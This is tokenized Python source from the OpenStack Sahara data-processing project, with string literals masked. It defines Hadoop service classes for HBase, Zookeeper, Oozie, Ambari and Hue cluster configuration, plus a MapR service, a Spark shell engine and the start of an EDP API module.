<EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> } <EOL> def __init__ ( self ) : <EOL> super ( HBaseService , self ) . __init__ ( <EOL> HBaseService . get_service_id ( ) ) <EOL> self . configurations . add ( '<STR_LIT>' ) <EOL> @ classmethod <EOL> def get_service_id ( cls ) : <EOL> return '<STR_LIT>' <EOL> def validate ( self , cluster_spec , cluster ) : <EOL> count = cluster_spec . get_deployed_node_group_count ( '<STR_LIT>' ) <EOL> if count != <NUM_LIT:1> : <EOL> raise ex . InvalidComponentCountException ( '<STR_LIT>' , <NUM_LIT:1> , count ) <EOL> def register_service_urls ( self , cluster_spec , url_info , cluster ) : <EOL> master_ip = cluster_spec . determine_component_hosts ( <EOL> '<STR_LIT>' ) . pop ( ) . management_ip <EOL> hbase_config = cluster_spec . configurations [ '<STR_LIT>' ] <EOL> info_port = hbase_config [ '<STR_LIT>' ] <EOL> url_info [ '<STR_LIT>' ] = { <EOL> '<STR_LIT>' : '<STR_LIT>' % ( master_ip , info_port ) , <EOL> '<STR_LIT>' : '<STR_LIT>' % ( master_ip , info_port ) , <EOL> '<STR_LIT>' : '<STR_LIT>' % ( master_ip , info_port ) , <EOL> '<STR_LIT>' : '<STR_LIT>' % ( master_ip , info_port ) , <EOL> '<STR_LIT>' : '<STR_LIT>' % ( master_ip , info_port ) , <EOL> '<STR_LIT>' : '<STR_LIT>' % ( master_ip , info_port ) <EOL> } <EOL> return url_info <EOL> def register_user_input_handlers ( self , ui_handlers ) : <EOL> for prop_name in self . property_map : <EOL> ui_handlers [ prop_name ] = ( <EOL> self . _handle_config_property_update ) <EOL> ui_handlers [ '<STR_LIT>' ] = ( <EOL> self . _handle_user_property_root_dir ) <EOL> def _handle_config_property_update ( self , user_input , configurations ) : <EOL> self . _update_config_values ( configurations , user_input . value , <EOL> self . property_map [ user_input . config . name ] ) <EOL> def _handle_user_property_root_dir ( self , user_input , configurations ) : <EOL> configurations [ '<STR_LIT>' ] [ '<STR_LIT>' ] = user_input . value <EOL> match = re . search ( '<STR_LIT>' , user_input . value ) <EOL> if match : <EOL> configurations [ '<STR_LIT>' ] [ '<STR_LIT>' ] = match . group ( <NUM_LIT:3> ) <EOL> else : <EOL> raise e . InvalidDataException ( <EOL> _ ( "<STR_LIT>" ) <EOL> % user_input . value ) <EOL> def finalize_configuration ( self , cluster_spec ) : <EOL> nn_servers = cluster_spec . determine_component_hosts ( '<STR_LIT>' ) <EOL> if nn_servers : <EOL> self . _replace_config_token ( <EOL> cluster_spec , '<STR_LIT>' , nn_servers . pop ( ) . fqdn ( ) , <EOL> { '<STR_LIT>' : [ '<STR_LIT>' ] } ) <EOL> zk_servers = cluster_spec . determine_component_hosts ( '<STR_LIT>' ) <EOL> if zk_servers : <EOL> zk_list = [ z . fqdn ( ) for z in zk_servers ] <EOL> self . _replace_config_token ( <EOL> cluster_spec , '<STR_LIT>' , '<STR_LIT:U+002C>' . join ( zk_list ) , <EOL> { '<STR_LIT>' : [ '<STR_LIT>' ] } ) <EOL> def finalize_ng_components ( self , cluster_spec ) : <EOL> hbase_ng = cluster_spec . get_node_groups_containing_component ( <EOL> '<STR_LIT>' ) <EOL> components = hbase_ng [ <NUM_LIT:0> ] . components <EOL> if '<STR_LIT>' not in components : <EOL> components . append ( '<STR_LIT>' ) <EOL> if not cluster_spec . get_deployed_node_group_count ( <EOL> '<STR_LIT>' ) : <EOL> components . append ( '<STR_LIT>' ) <EOL> else : <EOL> hbase_ng = cluster_spec . get_node_groups_containing_component ( <EOL> '<STR_LIT>' ) <EOL> for ng in hbase_ng : <EOL> components = ng . components <EOL> if '<STR_LIT>' not in components : <EOL> components . append ( '<STR_LIT>' ) <EOL> if not cluster_spec . get_deployed_node_group_count ( '<STR_LIT>' ) : <EOL> zk_service = next ( service for service in cluster_spec . services <EOL> if service . name == '<STR_LIT>' ) <EOL> zk_service . deployed = True <EOL> components . append ( '<STR_LIT>' ) <EOL> class ZookeeperService ( Service ) : <EOL> def __init__ ( self ) : <EOL> super ( ZookeeperService , self ) . __init__ ( <EOL> ZookeeperService . get_service_id ( ) ) <EOL> @ classmethod <EOL> def get_service_id ( cls ) : <EOL> return '<STR_LIT>' <EOL> def validate ( self , cluster_spec , cluster ) : <EOL> count = cluster_spec . get_deployed_node_group_count ( '<STR_LIT>' ) <EOL> if count < <NUM_LIT:1> : <EOL> raise ex . InvalidComponentCountException ( <EOL> '<STR_LIT>' , '<STR_LIT>' , count ) <EOL> if cluster_spec . is_hdfs_ha_enabled ( cluster ) : <EOL> if not ( count >= <NUM_LIT:3> and ( count % <NUM_LIT:2> == <NUM_LIT:1> ) ) : <EOL> raise ex . NameNodeHAConfigurationError ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % count ) <EOL> def is_mandatory ( self ) : <EOL> return True <EOL> class OozieService ( Service ) : <EOL> def __init__ ( self ) : <EOL> super ( OozieService , self ) . __init__ ( OozieService . get_service_id ( ) ) <EOL> self . configurations . add ( '<STR_LIT>' ) <EOL> @ classmethod <EOL> def get_service_id ( cls ) : <EOL> return '<STR_LIT>' <EOL> def validate ( self , cluster_spec , cluster ) : <EOL> count = cluster_spec . get_deployed_node_group_count ( '<STR_LIT>' ) <EOL> if count != <NUM_LIT:1> : <EOL> raise ex . InvalidComponentCountException ( <EOL> '<STR_LIT>' , <NUM_LIT:1> , count ) <EOL> count = cluster_spec . get_deployed_node_group_count ( '<STR_LIT>' ) <EOL> if not count : <EOL> raise ex . InvalidComponentCountException ( <EOL> '<STR_LIT>' , '<STR_LIT>' , count ) <EOL> def finalize_configuration ( self , cluster_spec ) : <EOL> oozie_servers = cluster_spec . determine_component_hosts ( '<STR_LIT>' ) <EOL> if oozie_servers : <EOL> oozie_server = oozie_servers . pop ( ) <EOL> name_list = [ oozie_server . fqdn ( ) , oozie_server . internal_ip , <EOL> oozie_server . management_ip ] <EOL> self . _replace_config_token ( <EOL> cluster_spec , '<STR_LIT>' , oozie_server . fqdn ( ) , <EOL> { '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] } ) <EOL> self . _replace_config_token ( <EOL> cluster_spec , '<STR_LIT>' , "<STR_LIT:U+002C>" . join ( name_list ) , <EOL> { '<STR_LIT>' : [ '<STR_LIT>' ] } ) <EOL> def finalize_ng_components ( self , cluster_spec ) : <EOL> oozie_ng = cluster_spec . get_node_groups_containing_component ( <EOL> '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> components = oozie_ng . components <EOL> if '<STR_LIT>' not in components : <EOL> components . append ( '<STR_LIT>' ) <EOL> if '<STR_LIT>' not in components : <EOL> components . append ( '<STR_LIT>' ) <EOL> if '<STR_LIT>' not in components : <EOL> components . append ( '<STR_LIT>' ) <EOL> client_ngs = cluster_spec . get_node_groups_containing_component ( <EOL> '<STR_LIT>' ) <EOL> for ng in client_ngs : <EOL> components = ng . components <EOL> if '<STR_LIT>' not in components : <EOL> components . append ( '<STR_LIT>' ) <EOL> if '<STR_LIT>' not in components : <EOL> components . append ( '<STR_LIT>' ) <EOL> def register_service_urls ( self , cluster_spec , url_info , cluster ) : <EOL> oozie_ip = cluster_spec . determine_component_hosts ( <EOL> '<STR_LIT>' ) . pop ( ) . management_ip <EOL> port = self . _get_port_from_cluster_spec ( cluster_spec , '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> url_info [ '<STR_LIT>' ] = { <EOL> '<STR_LIT>' : '<STR_LIT>' % ( oozie_ip , port ) <EOL> } <EOL> return url_info <EOL> def register_user_input_handlers ( self , ui_handlers ) : <EOL> ui_handlers [ '<STR_LIT>' ] = ( <EOL> self . _handle_user_property_db_user ) <EOL> ui_handlers [ '<STR_LIT>' ] = ( <EOL> self . _handle_user_property_db_pwd ) <EOL> def _handle_user_property_db_user ( self , user_input , configurations ) : <EOL> oozie_site_config_map = configurations [ '<STR_LIT>' ] <EOL> oozie_site_config_map [ '<STR_LIT>' ] = ( <EOL> user_input . value ) <EOL> def _handle_user_property_db_pwd ( self , user_input , configurations ) : <EOL> oozie_site_config_map = configurations [ '<STR_LIT>' ] <EOL> oozie_site_config_map [ '<STR_LIT>' ] = ( <EOL> user_input . value ) <EOL> class GangliaService ( Service ) : <EOL> def __init__ ( self ) : <EOL> super ( GangliaService , self ) . __init__ ( GangliaService . get_service_id ( ) ) <EOL> @ classmethod <EOL> def get_service_id ( cls ) : <EOL> return '<STR_LIT>' <EOL> def validate ( self , cluster_spec , cluster ) : <EOL> count = cluster_spec . get_deployed_node_group_count ( '<STR_LIT>' ) <EOL> if count != <NUM_LIT:1> : <EOL> raise ex . InvalidComponentCountException ( '<STR_LIT>' , <NUM_LIT:1> , count ) <EOL> def is_user_template_component ( self , component ) : <EOL> return component . name != '<STR_LIT>' <EOL> def finalize_ng_components ( self , cluster_spec ) : <EOL> for ng in cluster_spec . node_groups . values ( ) : <EOL> if '<STR_LIT>' not in ng . components : <EOL> ng . components . append ( '<STR_LIT>' ) <EOL> class AmbariService ( Service ) : <EOL> def __init__ ( self ) : <EOL> super ( AmbariService , self ) . __init__ ( AmbariService . get_service_id ( ) , <EOL> False ) <EOL> self . configurations . add ( '<STR_LIT>' ) <EOL> self . admin_user_name = '<STR_LIT>' <EOL> @ classmethod <EOL> def get_service_id ( cls ) : <EOL> return '<STR_LIT>' <EOL> def validate ( self , cluster_spec , cluster ) : <EOL> count = cluster_spec . get_deployed_node_group_count ( '<STR_LIT>' ) <EOL> if count != <NUM_LIT:1> : <EOL> raise ex . InvalidComponentCountException ( '<STR_LIT>' , <NUM_LIT:1> , count ) <EOL> def register_service_urls ( self , cluster_spec , url_info , cluster ) : <EOL> ambari_ip = cluster_spec . determine_component_hosts ( <EOL> '<STR_LIT>' ) . pop ( ) . management_ip <EOL> port = cluster_spec . configurations [ '<STR_LIT>' ] . get ( <EOL> '<STR_LIT>' , '<STR_LIT>' ) <EOL> url_info [ '<STR_LIT>' ] = { <EOL> '<STR_LIT>' : '<STR_LIT>' . format ( ambari_ip , port ) <EOL> } <EOL> return url_info <EOL> def is_user_template_component ( self , component ) : <EOL> return component . name != '<STR_LIT>' <EOL> def register_user_input_handlers ( self , ui_handlers ) : <EOL> ui_handlers [ '<STR_LIT>' ] = ( <EOL> self . _handle_user_property_admin_user ) <EOL> ui_handlers [ '<STR_LIT>' ] = ( <EOL> self . _handle_user_property_admin_password ) <EOL> def is_mandatory ( self ) : <EOL> return True <EOL> def _handle_user_property_admin_user ( self , user_input , configurations ) : <EOL> admin_user = next ( user for user in self . users <EOL> if user . name == '<STR_LIT>' ) <EOL> admin_user . name = user_input . value <EOL> self . admin_user_name = user_input . value <EOL> def _handle_user_property_admin_password ( self , user_input , configurations ) : <EOL> admin_user = next ( user for user in self . users <EOL> if user . name == self . admin_user_name ) <EOL> admin_user . password = user_input . value <EOL> class SqoopService ( Service ) : <EOL> def __init__ ( self ) : <EOL> super ( SqoopService , self ) . __init__ ( SqoopService . get_service_id ( ) ) <EOL> @ classmethod <EOL> def get_service_id ( cls ) : <EOL> return '<STR_LIT>' <EOL> def finalize_ng_components ( self , cluster_spec ) : <EOL> sqoop_ngs = cluster_spec . get_node_groups_containing_component ( '<STR_LIT>' ) <EOL> for ng in sqoop_ngs : <EOL> if '<STR_LIT>' not in ng . components : <EOL> ng . components . append ( '<STR_LIT>' ) <EOL> if '<STR_LIT>' not in ng . components : <EOL> ng . components . append ( '<STR_LIT>' ) <EOL> class NagiosService ( Service ) : <EOL> def __init__ ( self ) : <EOL> super ( NagiosService , self ) . __init__ ( NagiosService . get_service_id ( ) ) <EOL> @ classmethod <EOL> def get_service_id ( cls ) : <EOL> return '<STR_LIT>' <EOL> def finalize_ng_components ( self , cluster_spec ) : <EOL> nagios_ngs = ( <EOL> cluster_spec . get_node_groups_containing_component ( '<STR_LIT>' ) ) <EOL> for ng in nagios_ngs : <EOL> if '<STR_LIT>' not in ng . components : <EOL> ng . components . append ( '<STR_LIT>' ) <EOL> if '<STR_LIT>' not in ng . components : <EOL> ng . components . append ( '<STR_LIT>' ) <EOL> if cluster_spec . get_deployed_node_group_count ( '<STR_LIT>' ) : <EOL> if '<STR_LIT>' not in ng . components : <EOL> ng . components . append ( '<STR_LIT>' ) <EOL> if cluster_spec . get_deployed_node_group_count ( '<STR_LIT>' ) : <EOL> if '<STR_LIT>' not in ng . components : <EOL> ng . components . append ( '<STR_LIT>' ) <EOL> if '<STR_LIT>' not in ng . components : <EOL> if not cluster_spec . get_deployed_node_group_count ( <EOL> '<STR_LIT>' ) : <EOL> hcat_service = next ( service for service in <EOL> cluster_spec . services if <EOL> service . name == '<STR_LIT>' ) <EOL> hcat_service . deployed = True <EOL> ng . components . append ( '<STR_LIT>' ) <EOL> class HueService ( Service ) : <EOL> default_web_ui_port = '<STR_LIT>' <EOL> required_services = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> def __init__ ( self ) : <EOL> super ( HueService , self ) . __init__ ( HueService . get_service_id ( ) , False ) <EOL> @ classmethod <EOL> def get_service_id ( cls ) : <EOL> return "<STR_LIT>" <EOL> @ staticmethod <EOL> def _get_java_home_from_config ( config ) : <EOL> return ( config . get ( '<STR_LIT>' , None ) <EOL> or config . get ( '<STR_LIT>' , None ) if config else None ) <EOL> @ staticmethod <EOL> def _get_java_home ( cluster_spec ) : <EOL> java_home = HueService . _get_java_home_from_config ( <EOL> cluster_spec . configurations . get ( '<STR_LIT>' , None ) <EOL> ) <EOL> if not java_home : <EOL> java_home = HueService . _get_java_home_from_config ( <EOL> cluster_spec . configurations . get ( '<STR_LIT>' , None ) <EOL> ) <EOL> return java_home or '<STR_LIT>' <EOL> @ staticmethod <EOL> def _append_host_substitution ( cluster_spec , component , var_name , <EOL> var_pattern_name , subs ) : <EOL> hosts = cluster_spec . determine_component_hosts ( component ) <EOL> if hosts : <EOL> subs [ var_name ] = hosts . pop ( ) . fqdn ( ) or '<STR_LIT:localhost>' <EOL> subs [ var_pattern_name ] = subs [ var_name ] . replace ( '<STR_LIT:.>' , '<STR_LIT>' ) <EOL> @ staticmethod <EOL> def _create_hue_ini_file_section ( property_sub_tree , level ) : <EOL> properties = property_sub_tree [ '<STR_LIT>' ] <EOL> sections = property_sub_tree [ '<STR_LIT>' ] <EOL> s = '<STR_LIT>' <EOL> if properties : <EOL> for name , value in six . iteritems ( properties ) : <EOL> s += '<STR_LIT:U+0020>' * ( level * <NUM_LIT:2> ) <EOL> s += "<STR_LIT>" . format ( name , value ) <EOL> if sections : <EOL> for name , section in six . iteritems ( sections ) : <EOL> s += "<STR_LIT:\n>" <EOL> s += '<STR_LIT:U+0020>' * ( ( level - <NUM_LIT:1> ) * <NUM_LIT:2> ) <EOL> s += '<STR_LIT:[>' * level <EOL> s += name <EOL> s += '<STR_LIT:]>' * level <EOL> s += "<STR_LIT:\n>" <EOL> s += HueService . _create_hue_ini_file_section ( section , <EOL> level + <NUM_LIT:1> ) <EOL> return s <EOL> @ staticmethod <EOL> def _create_hue_ini_file ( property_tree ) : <EOL> if property_tree : <EOL> return HueService . _create_hue_ini_file_section ( property_tree , <NUM_LIT:1> ) <EOL> else : <EOL> return '<STR_LIT>' <EOL> @ staticmethod <EOL> def _create_hue_property_tree ( cluster_spec ) : <EOL> config_name = '<STR_LIT>' <EOL> hue_ini_property_tree = { '<STR_LIT>' : { } , '<STR_LIT>' : { } } <EOL> config = cluster_spec . configurations [ config_name ] <EOL> if config is None : <EOL> LOG . warning ( _LW ( '<STR_LIT>' <EOL> '<STR_LIT>' ) . format ( <EOL> config_name = config_name ) ) <EOL> else : <EOL> subs = { } <EOL> subs [ '<STR_LIT>' ] = HueService . _get_java_home ( cluster_spec ) <EOL> HueService . _append_host_substitution ( cluster_spec , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> subs ) <EOL> HueService . _append_host_substitution ( cluster_spec , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> subs ) <EOL> HueService . _append_host_substitution ( cluster_spec , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> subs ) <EOL> HueService . _append_host_substitution ( cluster_spec , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> subs ) <EOL> HueService . _append_host_substitution ( cluster_spec , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> subs ) <EOL> HueService . _append_host_substitution ( cluster_spec , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> subs ) <EOL> for prop_name , prop_value in six . iteritems ( config ) : <EOL> if prop_value : <EOL> if subs : <EOL> for placeholder , sub in six . iteritems ( subs ) : <EOL> if prop_value . find ( placeholder ) >= <NUM_LIT:0> : <EOL> value = prop_value . replace ( placeholder , sub ) <EOL> LOG . debug ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' . <EOL> format ( p_name = prop_name , <EOL> p_value = prop_value , <EOL> value = value ) ) <EOL> prop_value = value <EOL> if prop_value and len ( prop_value ) > <NUM_LIT:0> : <EOL> node = hue_ini_property_tree <EOL> tokens = prop_name . split ( '<STR_LIT:/>' ) <EOL> if tokens : <EOL> name = tokens . pop ( ) <EOL> while tokens : <EOL> token = tokens . pop ( <NUM_LIT:0> ) <EOL> if token not in node [ '<STR_LIT>' ] : <EOL> data = { '<STR_LIT>' : { } , <EOL> '<STR_LIT>' : { } } <EOL> node [ '<STR_LIT>' ] [ token ] = data <EOL> node = node [ '<STR_LIT>' ] [ token ] <EOL> node [ '<STR_LIT>' ] [ name ] = prop_value <EOL> LOG . info ( _LI ( '<STR_LIT>' <EOL> '<STR_LIT>' ) . format ( config_name = config_name ) ) <EOL> return hue_ini_property_tree <EOL> @ staticmethod <EOL> def _merge_configurations ( cluster_spec , src_config_name , dst_config_name ) : <EOL> src_config = cluster_spec . configurations [ src_config_name ] <EOL> dst_config = cluster_spec . configurations [ dst_config_name ] <EOL> if src_config is None : <EOL> LOG . warning ( _LW ( '<STR_LIT>' <EOL> '<STR_LIT>' ) . <EOL> format ( config_name = src_config_name ) ) <EOL> elif dst_config is None : <EOL> LOG . warning ( _LW ( '<STR_LIT>' <EOL> '<STR_LIT>' ) . <EOL> format ( config_name = dst_config_name ) ) <EOL> else : <EOL> for property_name , property_value in six . iteritems ( src_config ) : <EOL> if property_name in dst_config : <EOL> if dst_config [ property_name ] == src_config [ property_name ] : <EOL> LOG . debug ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> . format ( d_config_name = dst_config_name , <EOL> s_config_name = src_config_name , <EOL> property_name = property_name ) ) <EOL> else : <EOL> LOG . warning ( _LW ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) . <EOL> format ( dst_config_name = dst_config_name , <EOL> src_config_name = src_config_name , <EOL> property_name = property_name , <EOL> dst_config = dst_config [ <EOL> property_name ] , <EOL> src_config = src_config [ <EOL> property_name ] ) ) <EOL> else : <EOL> LOG . debug ( '<STR_LIT>' <EOL> '<STR_LIT>' . format ( <EOL> d_config = dst_config_name , <EOL> s_config = src_config_name , <EOL> p_name = property_name ) ) <EOL> dst_config [ property_name ] = property_value <EOL> LOG . info ( _LI ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> . format ( source = src_config_name , <EOL> destination = dst_config_name ) ) <EOL> @ staticmethod <EOL> def _handle_pre_service_start ( instance , cluster_spec , hue_ini , <EOL> create_user ) : <EOL> with instance . remote ( ) as r : <EOL> r . execute_command ( '<STR_LIT>' , <EOL> run_as_root = True ) <EOL> LOG . info ( _LI ( '<STR_LIT>' ) ) <EOL> r . write_file_to ( '<STR_LIT>' , <EOL> hue_ini , <EOL> True ) <EOL> r . execute_command ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> run_as_root = True ) <EOL> r . execute_command ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' , run_as_root = True ) <EOL> LOG . info ( _LI ( '<STR_LIT>' ) ) <EOL> r . execute_command ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> run_as_root = True ) <EOL> LOG . info ( _LI ( '<STR_LIT>' ) ) <EOL> if create_user : <EOL> r . execute_command ( '<STR_LIT>' <EOL> '<STR_LIT>' , run_as_root = True ) <EOL> LOG . info ( _LI ( '<STR_LIT>' ) ) <EOL> java_home = HueService . _get_java_home ( cluster_spec ) <EOL> if java_home : <EOL> r . replace_remote_string ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' % java_home ) <EOL> r . execute_command ( '<STR_LIT>' , run_as_root = True ) <EOL> r . execute_command ( '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> run_as_root = True ) <EOL> LOG . info ( _LI ( '<STR_LIT>' ) ) <EOL> def finalize_configuration ( self , cluster_spec ) : <EOL> LOG . debug ( '<STR_LIT>' ) <EOL> self . _merge_configurations ( cluster_spec , '<STR_LIT>' , '<STR_LIT>' ) <EOL> LOG . debug ( '<STR_LIT>' ) <EOL> self . _merge_configurations ( cluster_spec , '<STR_LIT>' , '<STR_LIT>' ) <EOL> LOG . debug ( '<STR_LIT>' ) <EOL> self . _merge_configurations ( cluster_spec , '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> LOG . debug ( '<STR_LIT>' ) <EOL> self . _merge_configurations ( cluster_spec , '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> def register_service_urls ( self , cluster_spec , url_info , cluster ) : <EOL> hosts = cluster_spec . determine_component_hosts ( '<STR_LIT>' ) <EOL> if hosts is not None : <EOL> host = hosts . pop ( ) <EOL> if host is not None : <EOL> config = cluster_spec . configurations [ '<STR_LIT>' ] <EOL> if config is not None : <EOL> port = config . get ( '<STR_LIT>' , <EOL> self . default_web_ui_port ) <EOL> else : <EOL> port = self . default_web_ui_port <EOL> ip = host . management_ip <EOL> url_info [ self . name . title ( ) ] = { <EOL> '<STR_LIT>' : '<STR_LIT>' . format ( ip , port ) <EOL> } <EOL> return url_info <EOL> def validate ( self , cluster_spec , cluster ) : <EOL> count = cluster_spec . get_deployed_node_group_count ( '<STR_LIT>' ) <EOL> if count != <NUM_LIT:1> : <EOL> raise ex . InvalidComponentCountException ( '<STR_LIT>' , <NUM_LIT:1> , count ) <EOL> services = cluster_spec . services <EOL> for reqd_service in self . required_services : <EOL> reqd_service_deployed = False <EOL> if services is not None : <EOL> for service in services : <EOL> reqd_service_deployed = ( service . deployed <EOL> and service . name == reqd_service ) <EOL> if reqd_service_deployed : <EOL> break <EOL> if not reqd_service_deployed : <EOL> raise ex . RequiredServiceMissingException ( reqd_service , <EOL> self . name ) <EOL> def finalize_ng_components ( self , cluster_spec ) : <EOL> hue_ngs = cluster_spec . get_node_groups_containing_component ( '<STR_LIT>' ) <EOL> if hue_ngs is not None : <EOL> for hue_ng in hue_ngs : <EOL> components = hue_ng . components <EOL> if '<STR_LIT>' not in components : <EOL> components . append ( '<STR_LIT>' ) <EOL> LOG . info ( _LI ( '<STR_LIT>' <EOL> '<STR_LIT>' ) ) <EOL> if cluster_spec . get_deployed_node_group_count ( '<STR_LIT>' ) : <EOL> if '<STR_LIT>' not in components : <EOL> components . append ( '<STR_LIT>' ) <EOL> LOG . info ( _LI ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) ) <EOL> def pre_service_start ( self , cluster_spec , ambari_info , started_services ) : <EOL> hue_property_tree = HueService . _create_hue_property_tree ( cluster_spec ) <EOL> hue_ini = HueService . _create_hue_ini_file ( hue_property_tree ) <EOL> create_user = False <EOL> config = cluster_spec . configurations [ '<STR_LIT>' ] <EOL> if config is not None : <EOL> username = config . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> password = config . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> create_user = username != '<STR_LIT>' and password != '<STR_LIT>' <EOL> hue_ngs = cluster_spec . get_node_groups_containing_component ( "<STR_LIT>" ) <EOL> if hue_ngs : <EOL> for ng in hue_ngs : <EOL> if ng . instances : <EOL> for instance in ng . instances : <EOL> with context . set_current_instance_id ( <EOL> instance . instance_id ) : <EOL> HueService . _handle_pre_service_start ( instance , <EOL> cluster_spec , <EOL> hue_ini , <EOL> create_user ) </s>
<s> import sahara . plugins . mapr . domain . node_process as np <EOL> import sahara . plugins . mapr . domain . service as s <EOL> import sahara . plugins . mapr . util . commands as cmd <EOL> import sahara . plugins . mapr . util . validation_utils as vu <EOL> ZK_CLIENT_PORT = <NUM_LIT> <EOL> ZOOKEEPER = np . NodeProcess ( <EOL> name = '<STR_LIT>' , <EOL> ui_name = '<STR_LIT>' , <EOL> package = '<STR_LIT>' , <EOL> open_ports = [ ZK_CLIENT_PORT ] <EOL> ) <EOL> WEB_SERVER = np . NodeProcess ( <EOL> name = '<STR_LIT>' , <EOL> ui_name = '<STR_LIT>' , <EOL> package = '<STR_LIT>' , <EOL> open_ports = [ <NUM_LIT> ] <EOL> ) <EOL> METRICS = np . NodeProcess ( <EOL> name = '<STR_LIT>' , <EOL> ui_name = '<STR_LIT>' , <EOL> package = '<STR_LIT>' , <EOL> open_ports = [ <NUM_LIT> ] <EOL> ) <EOL> class Management ( s . Service ) : <EOL> SSL_KEYSTORE = '<STR_LIT>' <EOL> def __init__ ( self ) : <EOL> super ( Management , self ) . __init__ ( ) <EOL> self . _ui_name = '<STR_LIT>' <EOL> self . _node_processes = [ ZOOKEEPER , WEB_SERVER , METRICS ] <EOL> self . _ui_info = [ <EOL> ( '<STR_LIT>' , WEB_SERVER , '<STR_LIT>' ) , <EOL> ] <EOL> self . _validation_rules = [ <EOL> vu . at_least ( <NUM_LIT:1> , ZOOKEEPER ) , <EOL> vu . at_least ( <NUM_LIT:1> , WEB_SERVER ) , <EOL> vu . odd_count_of ( ZOOKEEPER ) , <EOL> ] <EOL> def post_install ( self , cluster_context , instances ) : <EOL> instance = cluster_context . get_instance ( WEB_SERVER ) <EOL> cmd . chown ( instance , '<STR_LIT>' , self . SSL_KEYSTORE ) </s>
<s> from sahara . plugins import utils as plugin_utils <EOL> from sahara . service . edp . spark import engine as shell_engine <EOL> class ShellEngine ( shell_engine . SparkShellJobEngine ) : <EOL> def __init__ ( self , cluster ) : <EOL> super ( ShellEngine , self ) . __init__ ( cluster ) <EOL> self . master = plugin_utils . get_instance ( cluster , "<STR_LIT>" ) <EOL> @ staticmethod <EOL> def job_type_supported ( job_type ) : <EOL> return ( job_type in shell_engine . SparkShellJobEngine . <EOL> get_supported_job_types ( ) ) </s>
<s> from oslo_config import cfg <EOL> from oslo_log import log as logging <EOL> import six <EOL> from sahara import conductor as c <EOL> from sahara import context <EOL> from sahara import exceptions as ex <EOL> from sahara . i18n import _LE <EOL> from sahara . plugins import base as plugin_base <EOL> from sahara . service import api <EOL> from sahara . service . edp . binary_retrievers import dispatch <EOL> from sahara . service . edp import job_manager as manager <EOL> from sahara . utils import edp <EOL> from sahara . utils import proxy as p <EOL> conductor = c . API <EOL> LOG = logging . getLogger ( __name__ ) <EOL> CONF = cfg . CONF <EOL> def get_job_types ( ** kwargs ) : <EOL> hints = kwargs . get ( "<STR_LIT>" , [ "<STR_LIT:false>" ] ) [ <NUM_LIT:0> ] . lower ( ) == "<STR_LIT:true>" <EOL> plugin_names = kwargs . get ( "<STR_LIT>" , [ ] ) <EOL> all_plugins = plugin_base . PLUGINS . get_plugins ( ) <EOL> if plugin_names : <EOL> plugins = filter ( lambda x : x . name in plugin_names , all_plugins ) <EOL> else : <EOL> plugins = all_plugins <EOL> job_types = kwargs . get ( "<STR_LIT:type>" , edp . JOB_TYPES_ALL ) <EOL> versions = kwargs . get ( "<STR_LIT:version>" , [ ] ) <EOL> res = 